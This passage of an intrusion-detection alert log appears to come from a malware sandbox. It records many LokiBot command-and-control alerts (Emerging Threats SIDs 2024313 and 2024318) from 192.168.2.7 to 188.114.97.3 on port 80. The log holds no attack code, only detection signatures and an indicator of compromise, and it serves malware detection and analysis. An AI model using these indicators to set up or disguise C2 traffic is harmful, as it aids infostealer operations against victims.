2024-09-25T10:19:38.140430+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49735	188.114.97.3	80	TCP
2024-09-25T10:19:39.901885+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49736	188.114.97.3	80	TCP
2024-09-25T10:19:40.752516+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49737	188.114.97.3	80	TCP
2024-09-25T10:19:41.580058+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49738	188.114.97.3	80	TCP
2024-09-25T10:19:42.413942+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49739	188.114.97.3	80	TCP
2024-09-25T10:19:43.241128+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49740	188.114.97.3	80	TCP
2024-09-25T10:19:44.027788+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49741	188.114.97.3	80	TCP
2024-09-25T10:19:44.852239+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49742	188.114.97.3	80	TCP
2024-09-25T10:19:45.666427+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49743	188.114.97.3	80	TCP
2024-09-25T10:19:46.545472+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49744	188.114.97.3	80	TCP
2024-09-25T10:19:47.442427+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49745	188.114.97.3	80	TCP
2024-09-25T10:19:48.277146+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49746	188.114.97.3	80	TCP
2024-09-25T10:19:49.076736+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49747	188.114.97.3	80	TCP
2024-09-25T10:19:49.885438+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49748	188.114.97.3	80	TCP
2024-09-25T10:19:50.708565+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49749	188.114.97.3	80	TCP
2024-09-25T10:19:51.507840+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49750	188.114.97.3	80	TCP
2024-09-25T10:19:52.350336+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49751	188.114.97.3	80	TCP
2024-09-25T10:19:53.355659+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49752	188.114.97.3	80	TCP
2024-09-25T10:19:54.186780+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49753	188.114.97.3	80	TCP
2024-09-25T10:19:55.325978+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49754	188.114.97.3	80	TCP
2024-09-25T10:19:56.126948+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49755	188.114.97.3	80	TCP
2024-09-25T10:19:57.009360+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49756	188.114.97.3	80	TCP
2024-09-25T10:19:58.849605+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49757	188.114.97.3	80	TCP
2024-09-25T10:19:59.726091+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49758	188.114.97.3	80	TCP
2024-09-25T10:20:00.560306+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49759	188.114.97.3	80	TCP
2024-09-25T10:20:01.361671+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49760	188.114.97.3	80	TCP
2024-09-25T10:20:02.229063+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49761	188.114.97.3	80	TCP
2024-09-25T10:20:03.088731+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49763	188.114.97.3	80	TCP
2024-09-25T10:20:03.904946+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49764	188.114.97.3	80	TCP
2024-09-25T10:20:04.881977+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49765	188.114.97.3	80	TCP
2024-09-25T10:20:05.709216+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49766	188.114.97.3	80	TCP
2024-09-25T10:20:06.566813+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49767	188.114.97.3	80	TCP
2024-09-25T10:20:07.429765+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49768	188.114.97.3	80	TCP
2024-09-25T10:20:09.278627+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49769	188.114.97.3	80	TCP
2024-09-25T10:20:10.191855+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49770	188.114.97.3	80	TCP
2024-09-25T10:20:11.008415+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49771	188.114.97.3	80	TCP
2024-09-25T10:20:11.812480+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49772	188.114.97.3	80	TCP
2024-09-25T10:20:12.630621+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49773	188.114.97.3	80	TCP
2024-09-25T10:20:13.435959+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49774	188.114.97.3	80	TCP
2024-09-25T10:20:14.236381+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49775	188.114.97.3	80	TCP
2024-09-25T10:20:15.051935+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49776	188.114.97.3	80	TCP
2024-09-25T10:20:15.897467+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49777	188.114.97.3	80	TCP
2024-09-25T10:20:16.724336+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49778	188.114.97.3	80	TCP
2024-09-25T10:20:17.550653+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49779	188.114.97.3	80	TCP
2024-09-25T10:20:18.430421+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49780	188.114.97.3	80	TCP
2024-09-25T10:20:19.235882+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49781	188.114.97.3	80	TCP
2024-09-25T10:20:20.044297+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49782	188.114.97.3	80	TCP
2024-09-25T10:20:21.084561+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49783	188.114.97.3	80	TCP
2024-09-25T10:20:21.896883+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49784	188.114.97.3	80	TCP
2024-09-25T10:20:22.717675+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49785	188.114.97.3	80	TCP
2024-09-25T10:20:23.537060+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49786	188.114.97.3	80	TCP
2024-09-25T10:20:24.398012+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49787	188.114.97.3	80	TCP
2024-09-25T10:20:25.366305+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49788	188.114.97.3	80	TCP
2024-09-25T10:20:26.202166+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49789	188.114.97.3	80	TCP
2024-09-25T10:20:27.025481+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49790	188.114.97.3	80	TCP
2024-09-25T10:20:27.837448+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49791	188.114.97.3	80	TCP
2024-09-25T10:20:28.650735+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49792	188.114.97.3	80	TCP
2024-09-25T10:20:29.642863+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49793	188.114.97.3	80	TCP
2024-09-25T10:20:30.571474+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49794	188.114.97.3	80	TCP
2024-09-25T10:20:31.377167+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49795	188.114.97.3	80	TCP
2024-09-25T10:20:32.191160+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49796	188.114.97.3	80	TCP
2024-09-25T10:20:33.000475+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49797	188.114.97.3	80	TCP
2024-09-25T10:20:33.843258+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49798	188.114.97.3	80	TCP
2024-09-25T10:20:34.678916+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49799	188.114.97.3	80	TCP
2024-09-25T10:20:35.509847+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49800	188.114.97.3	80	TCP
2024-09-25T10:20:36.333409+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49801	188.114.97.3	80	TCP
2024-09-25T10:20:37.192021+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49802	188.114.97.3	80	TCP
2024-09-25T10:20:38.012160+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49803	188.114.97.3	80	TCP
2024-09-25T10:20:38.830735+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49804	188.114.97.3	80	TCP
2024-09-25T10:20:39.656614+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49805	188.114.97.3	80	TCP
2024-09-25T10:20:40.523719+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49806	188.114.97.3	80	TCP
2024-09-25T10:20:41.372812+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49807	188.114.97.3	80	TCP
2024-09-25T10:20:42.248861+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49808	188.114.97.3	80	TCP
2024-09-25T10:20:43.045056+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49809	188.114.97.3	80	TCP
2024-09-25T10:20:43.854654+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49810	188.114.97.3	80	TCP
2024-09-25T10:20:44.684574+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49811	188.114.97.3	80	TCP
2024-09-25T10:20:45.503133+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49812	188.114.97.3	80	TCP
2024-09-25T10:20:46.424917+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49813	188.114.97.3	80	TCP
2024-09-25T10:20:47.222041+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49814	188.114.97.3	80	TCP
2024-09-25T10:20:48.049566+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49815	188.114.97.3	80	TCP
2024-09-25T10:20:49.020610+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49816	188.114.97.3	80	TCP
2024-09-25T10:20:50.103271+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49817	188.114.97.3	80	TCP
2024-09-25T10:20:50.944188+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49818	188.114.97.3	80	TCP
2024-09-25T10:20:51.808740+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49819	188.114.97.3	80	TCP
2024-09-25T10:20:52.620616+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49820	188.114.97.3	80	TCP
2024-09-25T10:20:53.479823+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49821	188.114.97.3	80	TCP
2024-09-25T10:20:54.312873+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49822	188.114.97.3	80	TCP
2024-09-25T10:20:55.121000+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49823	188.114.97.3	80	TCP
2024-09-25T10:20:55.938989+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49824	188.114.97.3	80	TCP
2024-09-25T10:20:56.779578+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49825	188.114.97.3	80	TCP
2024-09-25T10:20:57.616206+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49826	188.114.97.3	80	TCP
2024-09-25T10:20:58.434386+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49827	188.114.97.3	80	TCP
2024-09-25T10:20:59.260870+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49828	188.114.97.3	80	TCP
2024-09-25T10:21:00.485716+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49829	188.114.97.3	80	TCP
2024-09-25T10:21:01.352133+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49830	188.114.97.3	80	TCP
2024-09-25T10:21:02.141157+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49831	188.114.97.3	80	TCP
2024-09-25T10:21:03.199950+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49832	188.114.97.3	80	TCP
2024-09-25T10:21:04.015053+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49833	188.114.97.3	80	TCP
2024-09-25T10:21:05.131735+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49834	188.114.97.3	80	TCP
2024-09-25T10:21:05.949911+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49835	188.114.97.3	80	TCP
2024-09-25T10:21:06.745448+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49836	188.114.97.3	80	TCP
2024-09-25T10:21:07.563958+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49837	188.114.97.3	80	TCP
2024-09-25T10:21:08.545523+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49838	188.114.97.3	80	TCP
2024-09-25T10:21:10.666965+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49839	188.114.97.3	80	TCP
2024-09-25T10:21:11.513058+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49840	188.114.97.3	80	TCP
2024-09-25T10:21:12.356325+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49841	188.114.97.3	80	TCP
2024-09-25T10:21:13.248308+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49842	188.114.97.3	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T10:19:10.811770+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49701	188.114.97.3	80	TCP
2024-09-25T10:19:11.665714+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49702	188.114.97.3	80	TCP
2024-09-25T10:19:12.531180+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49703	188.114.97.3	80	TCP
2024-09-25T10:19:13.453182+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49704	188.114.97.3	80	TCP
2024-09-25T10:19:14.450457+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49705	188.114.97.3	80	TCP
2024-09-25T10:19:15.399528+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49706	188.114.97.3	80	TCP
2024-09-25T10:19:16.220301+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49707	188.114.97.3	80	TCP
2024-09-25T10:19:17.022071+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49708	188.114.97.3	80	TCP
2024-09-25T10:19:18.146657+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49709	188.114.97.3	80	TCP
2024-09-25T10:19:18.987415+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49710	188.114.97.3	80	TCP
2024-09-25T10:19:19.794940+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49711	188.114.97.3	80	TCP
2024-09-25T10:19:20.899036+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49712	188.114.97.3	80	TCP
2024-09-25T10:19:21.689404+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49713	188.114.97.3	80	TCP
2024-09-25T10:19:22.552651+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49714	188.114.97.3	80	TCP
2024-09-25T10:19:23.518806+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49715	188.114.97.3	80	TCP
2024-09-25T10:19:24.365883+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49718	188.114.97.3	80	TCP
2024-09-25T10:19:25.286543+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49720	188.114.97.3	80	TCP
2024-09-25T10:19:27.092250+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49723	188.114.97.3	80	TCP
2024-09-25T10:19:28.045248+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49724	188.114.97.3	80	TCP
2024-09-25T10:19:28.881607+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49725	188.114.97.3	80	TCP
2024-09-25T10:19:29.680830+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49726	188.114.97.3	80	TCP
2024-09-25T10:19:30.583036+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49727	188.114.97.3	80	TCP
2024-09-25T10:19:31.369595+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49728	188.114.97.3	80	TCP
2024-09-25T10:19:32.827325+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49729	188.114.97.3	80	TCP
2024-09-25T10:19:33.628049+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49730	188.114.97.3	80	TCP
2024-09-25T10:19:34.467992+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49731	188.114.97.3	80	TCP
2024-09-25T10:19:35.318075+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49732	188.114.97.3	80	TCP
2024-09-25T10:19:36.366610+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49733	188.114.97.3	80	TCP
2024-09-25T10:19:37.190467+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49734	188.114.97.3	80	TCP
2024-09-25T10:19:38.140430+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49735	188.114.97.3	80	TCP
2024-09-25T10:19:39.901885+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49736	188.114.97.3	80	TCP
2024-09-25T10:19:40.752516+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49737	188.114.97.3	80	TCP
2024-09-25T10:19:41.580058+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49738	188.114.97.3	80	TCP
2024-09-25T10:19:42.413942+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49739	188.114.97.3	80	TCP
2024-09-25T10:19:43.241128+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49740	188.114.97.3	80	TCP
2024-09-25T10:19:44.027788+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49741	188.114.97.3	80	TCP
2024-09-25T10:19:44.852239+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49742	188.114.97.3	80	TCP
2024-09-25T10:19:45.666427+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49743	188.114.97.3	80	TCP
2024-09-25T10:19:46.545472+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49744	188.114.97.3	80	TCP
2024-09-25T10:19:47.442427+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49745	188.114.97.3	80	TCP
2024-09-25T10:19:48.277146+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49746	188.114.97.3	80	TCP
2024-09-25T10:19:49.076736+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49747	188.114.97.3	80	TCP
2024-09-25T10:19:49.885438+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49748	188.114.97.3	80	TCP
2024-09-25T10:19:50.708565+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49749	188.114.97.3	80	TCP
2024-09-25T10:19:51.507840+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49750	188.114.97.3	80	TCP
2024-09-25T10:19:52.350336+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49751	188.114.97.3	80	TCP
2024-09-25T10:19:53.355659+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49752	188.114.97.3	80	TCP
2024-09-25T10:19:54.186780+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49753	188.114.97.3	80	TCP
2024-09-25T10:19:55.325978+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49754	188.114.97.3	80	TCP
2024-09-25T10:19:56.126948+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49755	188.114.97.3	80	TCP
2024-09-25T10:19:57.009360+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49756	188.114.97.3	80	TCP
2024-09-25T10:19:58.849605+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49757	188.114.97.3	80	TCP
2024-09-25T10:19:59.726091+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49758	188.114.97.3	80	TCP
2024-09-25T10:20:00.560306+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49759	188.114.97.3	80	TCP
2024-09-25T10:20:01.361671+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49760	188.114.97.3	80	TCP
2024-09-25T10:20:02.229063+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49761	188.114.97.3	80	TCP
2024-09-25T10:20:03.088731+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49763	188.114.97.3	80	TCP
2024-09-25T10:20:03.904946+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49764	188.114.97.3	80	TCP
2024-09-25T10:20:04.881977+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49765	188.114.97.3	80	TCP
2024-09-25T10:20:05.709216+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49766	188.114.97.3	80	TCP
2024-09-25T10:20:06.566813+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49767	188.114.97.3	80	TCP
2024-09-25T10:20:07.429765+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49768	188.114.97.3	80	TCP
2024-09-25T10:20:09.278627+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49769	188.114.97.3	80	TCP
2024-09-25T10:20:10.191855+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49770	188.114.97.3	80	TCP
2024-09-25T10:20:11.008415+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49771	188.114.97.3	80	TCP
2024-09-25T10:20:11.812480+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49772	188.114.97.3	80	TCP
2024-09-25T10:20:12.630621+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49773	188.114.97.3	80	TCP
2024-09-25T10:20:13.435959+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49774	188.114.97.3	80	TCP
2024-09-25T10:20:14.236381+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49775	188.114.97.3	80	TCP
2024-09-25T10:20:15.051935+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49776	188.114.97.3	80	TCP
2024-09-25T10:20:15.897467+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49777	188.114.97.3	80	TCP
2024-09-25T10:20:16.724336+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49778	188.114.97.3	80	TCP
2024-09-25T10:20:17.550653+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49779	188.114.97.3	80	TCP
2024-09-25T10:20:18.430421+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49780	188.114.97.3	80	TCP
2024-09-25T10:20:19.235882+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49781	188.114.97.3	80	TCP
2024-09-25T10:20:20.044297+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49782	188.114.97.3	80	TCP
2024-09-25T10:20:21.084561+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49783	188.114.97.3	80	TCP
2024-09-25T10:20:21.896883+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49784	188.114.97.3	80	TCP
2024-09-25T10:20:22.717675+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49785	188.114.97.3	80	TCP
2024-09-25T10:20:23.537060+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49786	188.114.97.3	80	TCP
2024-09-25T10:20:24.398012+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49787	188.114.97.3	80	TCP
2024-09-25T10:20:25.366305+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49788	188.114.97.3	80	TCP
2024-09-25T10:20:26.202166+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49789	188.114.97.3	80	TCP
2024-09-25T10:20:27.025481+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49790	188.114.97.3	80	TCP
2024-09-25T10:20:27.837448+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49791	188.114.97.3	80	TCP
2024-09-25T10:20:28.650735+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49792	188.114.97.3	80	TCP
2024-09-25T10:20:29.642863+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49793	188.114.97.3	80	TCP
2024-09-25T10:20:30.571474+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49794	188.114.97.3	80	TCP
2024-09-25T10:20:31.377167+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49795	188.114.97.3	80	TCP
2024-09-25T10:20:32.191160+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49796	188.114.97.3	80	TCP
2024-09-25T10:20:33.000475+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49797	188.114.97.3	80	TCP
2024-09-25T10:20:33.843258+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49798	188.114.97.3	80	TCP
2024-09-25T10:20:34.678916+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49799	188.114.97.3	80	TCP
2024-09-25T10:20:35.509847+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49800	188.114.97.3	80	TCP
2024-09-25T10:20:36.333409+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49801	188.114.97.3	80	TCP
2024-09-25T10:20:37.192021+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49802	188.114.97.3	80	TCP
2024-09-25T10:20:38.012160+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49803	188.114.97.3	80	TCP
2024-09-25T10:20:38.830735+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49804	188.114.97.3	80	TCP
2024-09-25T10:20:39.656614+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49805	188.114.97.3	80	TCP
2024-09-25T10:20:40.523719+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49806	188.114.97.3	80	TCP
2024-09-25T10:20:41.372812+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49807	188.114.97.3	80	TCP
2024-09-25T10:20:42.248861+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49808	188.114.97.3	80	TCP
2024-09-25T10:20:43.045056+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49809	188.114.97.3	80	TCP
2024-09-25T10:20:43.854654+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49810	188.114.97.3	80	TCP
2024-09-25T10:20:44.684574+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49811	188.114.97.3	80	TCP
2024-09-25T10:20:45.503133+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49812	188.114.97.3	80	TCP
2024-09-25T10:20:46.424917+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49813	188.114.97.3	80	TCP
2024-09-25T10:20:47.222041+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49814	188.114.97.3	80	TCP
2024-09-25T10:20:48.049566+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49815	188.114.97.3	80	TCP
2024-09-25T10:20:49.020610+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49816	188.114.97.3	80	TCP
2024-09-25T10:20:50.103271+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49817	188.114.97.3	80	TCP
2024-09-25T10:20:50.944188+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49818	188.114.97.3	80	TCP
2024-09-25T10:20:51.808740+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49819	188.114.97.3	80	TCP
2024-09-25T10:20:52.620616+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49820	188.114.97.3	80	TCP
2024-09-25T10:20:53.479823+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49821	188.114.97.3	80	TCP
2024-09-25T10:20:54.312873+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49822	188.114.97.3	80	TCP
2024-09-25T10:20:55.121000+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49823	188.114.97.3	80	TCP
2024-09-25T10:20:55.938989+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49824	188.114.97.3	80	TCP
2024-09-25T10:20:56.779578+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49825	188.114.97.3	80	TCP
2024-09-25T10:20:57.616206+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49826	188.114.97.3	80	TCP
2024-09-25T10:20:58.434386+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49827	188.114.97.3	80	TCP
2024-09-25T10:20:59.260870+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.7	49828	188.114.97.3	80	TCP
